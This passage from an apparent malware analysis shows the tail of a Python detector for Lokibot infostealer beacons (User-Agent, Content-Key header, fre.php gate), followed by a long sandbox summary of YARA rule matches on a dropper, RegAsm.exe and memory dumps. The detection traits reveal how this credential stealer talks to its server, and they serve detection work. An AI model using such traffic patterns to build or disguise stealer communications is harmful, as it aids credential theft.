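    if req.headers.get("user-agent") == LOKIBOT_UA:
        hits.append("user-agent")
    if "content-key" in req.headers:          # non-standard header added by Lokibot
        hits.append("content-key-header")
    if req.method == "POST" and req.version == "HTTP/1.0":
        hits.append("post-http10")
    if req.path.lower().endswith("fre.php"):  # gate script name used by this panel
        hits.append("fre.php-endpoint")
    if (req.headers.get("content-type") == "application/octet-stream"
            and req.headers.get("content-encoding") == "binary"):
        hits.append("binary-body")
    return hits


def is_lokibot_beacon(raw: str) -> bool:
    """The fixed User-Agent alone is decisive; otherwise require the custom
    Content-Key header plus at least one supporting trait (author's threshold)."""
    hits = lokibot_indicators(parse_request(raw))
    return "user-agent" in hits or ("content-key-header" in hits and len(hits) >= 2)


if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, is_lokibot_beacon(raw), lokibot_indicators(parse_request(raw)))
```

Matching on the User-Agent alone catches this sample; the extra traits are there so a proxy log or pcap line that has been stripped of the UA can still be scored on the header combination.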

                System Summary

                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers (Author: ditekSHen)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload (Author: kevoreilly)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers (Author: ditekSHen)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload (Author: kevoreilly)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Loki Payload (Author: kevoreilly)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers (Author: ditekSHen)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload (Author: kevoreilly)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload (Author: kevoreilly)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (Author: unknown)
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory (Author: JPCERT/CC Incident Response Group)
                Source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 (Author: unknown)
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE (date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer (author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 (author = kevoreilly, description = Loki Payload, cape_type = Loki Payload)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE (date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer (author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 (author = kevoreilly, description = Loki Payload, cape_type = Loki Payload)
                Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE (date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 (author = kevoreilly, description = Loki Payload, cape_type = Loki Payload)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE (date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer (author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 (author = kevoreilly, description = Loki Payload, cape_type = Loki Payload)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE (date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 (author = kevoreilly, description = Loki Payload, cape_type = Loki Payload)
                Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 (reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23)
                Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot (hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research)
                Source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 (reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeCode function: 0_2_0176A5A80_2_0176A5A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeCode function: 0_2_0176CDE00_2_0176CDE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493B5401_2_0493B540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04933C001_2_04933C00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0493E8F01_2_0493E8F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04933C001_2_04933C00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072C23E81_2_072C23E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072C31481_2_072C3148
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072C4F701_2_072C4F70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072CA4091_2_072CA409
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.511627239.0000000004FF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519535055.000000000312E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000000.257527160.0000000000DA5000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLgrdypvg.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.514692941.0000000001158000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Binary or memory string: OriginalFilenameLgrdypvg.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | ReversingLabs: Detection: 14%
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
